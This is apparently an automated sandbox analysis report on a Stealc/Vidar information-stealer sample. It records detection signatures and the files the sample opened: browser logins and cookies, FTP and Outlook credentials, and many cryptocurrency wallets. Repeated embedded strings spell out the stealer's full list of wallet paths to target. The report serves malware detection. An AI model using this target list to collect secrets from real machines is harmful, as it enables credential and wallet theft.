              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C66AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C66AC62
              Source: C:\Users\user\Desktop\random(1).exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6B4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,0_2_6C6B4760
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C591C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,0_2_6C591C30
              Source: random(1).exe, random(1).exe, 00000000.00000002.2013637925.0000000001058000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: QProgram Manager
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C66AE71 cpuid 0_2_6C66AE71
              Source: C:\Users\user\Desktop\random(1).exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C66A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6C66A8DC
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5B8390 NSS_GetVersion,0_2_6C5B8390

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2013235084.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1728661894.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2013442010.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Yara detected Vidar stealer
              Source: Yara matchFile source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \ElectronCash\wallets\
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Jaxx Desktop (old)
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\exodus.wallet\
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: info.seco
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \jaxx\Local Storage\
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.jsonq
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Exodus\exodus.wallet
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.jsonK+
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: file__0.localstorage
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D54000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\exodus.wallet\
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: MultiDoge
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: seed.seco
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*
              Tries to harvest and steal Bitcoin Wallet information
              Source: C:\Users\user\Desktop\random(1).exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\Desktop\random(1).exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
